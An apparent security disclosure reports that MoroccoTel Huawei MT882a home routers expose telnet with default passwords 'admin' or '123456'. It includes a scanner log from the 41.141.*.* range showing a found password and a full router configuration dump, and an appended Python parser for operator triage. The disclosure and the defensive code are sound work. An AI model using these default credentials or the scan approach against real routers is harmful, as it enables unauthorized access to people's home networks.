Hi,
a "vulnerability" was identified on MoroccoTel Boxes:
a telnet server is running, open to the web, with a default password of
admin (or 123456).
This critical vulnerability can affect the entire network of a country.
Solution: change the default account password or modify the default firmware.
NB: a new firmware was released, introducing a cipher on the "PPPoE
password" (one common, publicly available PPPoE account is widely used).
Discovered by NETpeas research team; NETpeas CERT is trying to contact
the ISP.
More details:
Password:
telnettry
41.141.*.* -> Response telnet02: ****
Copyright (c) 2001 - 2006 Huawei
MT882a>
***********************************************************
41.141.*.* -> TELNET PASSWORD FOUND: admin
MT882a> show all
RAS version: V100R001B022 MoroccoTel 2010/02/26
System ID: $5.0.152.1(RUE0.C2)3.11.2.151 20110602_V001 [Jun 02 2011
13:54:48]
romRasSize: 1217226
system up time: 2:45:45 (f2cc9 ticks)
bootbase version: VTC_SPI1.5| 2011/05/26
Hostname = MT882a
Message = <empty>
ip route mode = Yes
bridge mode = Yes
DHCP setting:
DHCP Mode = Server
Client IP Pool Starting Address = 192.168.1.2
Size of Client IP Pool = 64
Primary DNS Server = 8.8.8.8
Secondary DNS Server = 8.8.4.4
DHCP server leasetime = 86400
TCP/IP Setup:
IP Address = 192.168.1.1
IP Subnet Mask = 255.255.255.0
Rip Direction = None
Version = Rip-1
Multicast = IGMP-v2
RemoteNode = 0
Rem Node Name = ISP-0(ISP)
Encapsulation = PPPoE
Multiplexing = LLC-based
Channel active = Yes
VPI/VCI value = 8/35
IP Routing mode= Yes
Bridge mode = No
PPP Username = <snip>
PPP Password
41.141.*.* -> = *******
PPP Username_ext2 =
PPP Password_ext2 =
Service name =
Remote IP Addr = 0.0.0.0
Remote IP Subnet Mask = 0.0.0.0
IP address assignment type = Dynamic
SUA = Yes
Multicast = None
Default Route node = Yes
RemoteNode = 1
Rem Node Name = ISP-1
Encapsulation = RFC 1483
Multiplexing = LLC-based
Channel
41.141.1.9 -> Port 80 open
41.141.*.* -> active = Yes
VPI/VCI value = 0/35
IP Routing mode= No
Bridge mode = Yes
Remote IP Addr = 0.0.0.0
Remote IP Subnet Mask = 0.0.0.0
41.141.*.* -> IP address assignment type = Dynamic
41.141.*.* -> SUA = No
Multicast = None
Default Route node = No
RemoteNode = 2
Rem Node Name = ISP-2
Encapsulation = RFC 1483
Multiplexing = LLC-based
Channel active = Yes
VPI/VCI value = 0/32
IP Routing mode= No
Bridge mode = Yes
Remote IP Addr = 0.0.0.0
Remote IP Subnet Mask = 0.0.0.0
IP address assignment type = Dynamic
SUA = No
Multicast = None
Default Route node = No
RemoteNode = 3
Rem Node Name = ISP-3
Encapsulation = RFC 1483
Multiplexing = LLC-based
Channel active = Yes
VPI/VCI value = 8/32
IP Routing mode= No
Bridge mode = Yes
Remote IP Addr = 0.0.0.0
Remote IP Subnet Mask = 0.0.0.0
IP address assignment type = Dynamic
SUA = No
Multicast = None
Default Route node = No
RemoteNode = 4
Rem Node Name = ISP-4
Encapsulation = RFC 1483
Multiplexing = LLC-based
Channel active = Yes
VPI/VCI value = 8/81
IP Routing mode= No
Bridge mode = Yes
Remote IP
41.141.*.* -> Addr = 0.0.0.0
Remote IP Subnet Mask = 0.0.0.0
IP address assignment type = Dynamic
SUA = No
Multicast = None
Default Route node = No
RemoteNode = 5
Rem Node Name = ISP-5
Encapsulation = RFC 1483
Multiplexing = LLC-based
Channel active = Yes
VPI/VCI value = 0/100
IP Routing mode= No
Bridge mode = Yes
Remote IP A
41.141.*.* -> ddr = 0.0.0.0
Remote IP Subnet Mask = 0.0.0.0
IP address assignment type = Dynamic
SUA = No
sMulticast = None
41.141.*.* -> yDefault Route node = No
s
RemoteNode = 6
aRem Node Name = ISP-6t
sEncapsulation = hRFC 1483
Multiplexing = LLC-based
Channel active = Yes
VPI/VCI value = 1/39
IP Routing mode= No
Bridge mode = Yes
Remote IP Addr = 0.0.0.0
Remote IP Subnet Mask = 0.0.0.0
IP address assignment type = Dynamic
SUA = No
Multicast = None
Default Route node = No
RemoteNode = 7
Rem Node Name = ISP-7
Encapsulation = RFC 1483
Multiplexing = LLC-based
Channel active = Yes
VPI/VCI value = 0/16
IP Routing mode= No
Bridge mode = Yes
Remote IP Addr = 0.0.0.0
Remote IP Subnet Mask = 0.0.0.0
IP address assignment type = Dynamic
SUA = No
Multicast = None
Default Route node = No
MT882a>
RAS version : V100R001B022 MoroccoTel
romRasSize : 1217226
bootbase version : VTC_SPI1.5| 2011/05/26
Product Model : SmartAX
MAC Address : <snip-inclear>
Default Count
41.141.*.* -> ry Code : FF
Boot Module Debug Flag : 00
RomFile Version : 9F
RomFile Checksum : dceb
RAS F/W Checksum : 87b7
SNMP MIB level & OID : 050000000100000002000000030000000400000005
Main Feature Bits : 86
Other Feature Bits :
93 17 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 13 00 00 00
MT882a>
41.141.*.* -> e
41.141.*.* -> ther config
--------------- NDIS CONFIGURATION BLOCK ----------------
type=1 flags=0001
Board/Chassis:1 Lines/Board:1 Channels/Lines:2 Total Channel:2
task-id=8041f1f4 event-q=80458c2c(19) data-q=80458c70(1a) func-id=2
board-cfg=8042c8a4 line-cfg=8042c8bc chann-cfg=8042c8d0
board-pp (8042c8f0)
804273fc
line-pp (8042c8f4)
8042956c
chann-pp (8042c8f8)
804bf8a4 804bfe34
--------------- BOARD DISPLAY ---------------------------
ID slot# n-line n-chann status line-cfg chann-cfg
00 0 1 2 0001 8042c8bc 8042c8d0
--------------- LINE DISPLAY ---------------------------
ID line# board-id n-chann chann-cfg
00 1 00 2 8042c8d0
--------------- CHANNEL DISPLAY -------------------------
ID chan# line-id board-id address name
00 1 00 00 804bf8a4 enet0
01 2 00 00 804bfe34 enet1
MT882a>
--
Jerome Athias - NETpeas
VP, Director of Software Engineer
Palo Alto - Paris - Casablanca
Mobile: +212665346454
www.netpeas.com
---------------------------------------------
Stay updated on Security: www.vulnerabilitydatabase.com
"The computer security is an art form. It's the ultimate martial art."
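For an operator triaging its own devices against this report, the `show all` dump above can be parsed into per-node records. This is an added example, not code from the original post or from NETpeas; the sample dump is constructed, and the `flagged_builds` list and the `triage` rules are assumptions an operator would maintain.

```python
import re

# Scanner progress prefix interleaved with device output in the capture,
# e.g. "41.141.*.* -> SUA = No". Assumption: it always has this "<addr> -> " shape.
PREFIX = re.compile(r"^\s*[\d*]+(?:\.[\d*]+){3}\s*->\s*")
KV = re.compile(r"^\s*([^=:]+?)\s*([=:])\s*(.*?)\s*$")

def parse_show_all(text):
    """Parse `show all` output into (system, nodes); one dict per RemoteNode."""
    system, nodes, current = {}, [], None
    for raw in text.splitlines():
        m = KV.match(PREFIX.sub("", raw))
        if not m:
            continue                      # prompts and fragments without a separator
        key, sep, value = m.groups()
        if sep == ":" and not value:
            continue                      # section headers such as "DHCP setting:"
        if key == "RemoteNode":
            current = {"RemoteNode": int(value)}
            nodes.append(current)
        elif current is not None:
            current[key] = value
        else:
            system[key] = value
    return system, nodes

def triage(system, nodes, flagged_builds):
    """Return findings; flagged_builds is a hypothetical operator-maintained set."""
    findings = []
    if system.get("RAS version", "").split(" ")[0] in flagged_builds:
        findings.append("firmware build is on the to-fix list")
    for n in nodes:
        if n.get("Encapsulation") == "PPPoE" and n.get("PPP Username"):
            findings.append(f"node {n['RemoteNode']}: PPPoE account stored on device, rotate it")
    return findings

# Constructed sample in the same layout as the capture (not real device data).
SAMPLE = """\
RAS version: V100R001B022 MoroccoTel 2010/02/26
Hostname = MT882a
RemoteNode = 0
Rem Node Name = ISP-0(ISP)
Encapsulation = PPPoE
PPP Username = user@example
192.0.2.* -> SUA = Yes
RemoteNode = 1
Encapsulation = RFC 1483
192.0.2.* -> Bridge mode = Yes
"""
```

Fields that the interleaved scanner output split across two lines (such as `Channel` / `active = Yes` in the capture) are not rejoined by this parser.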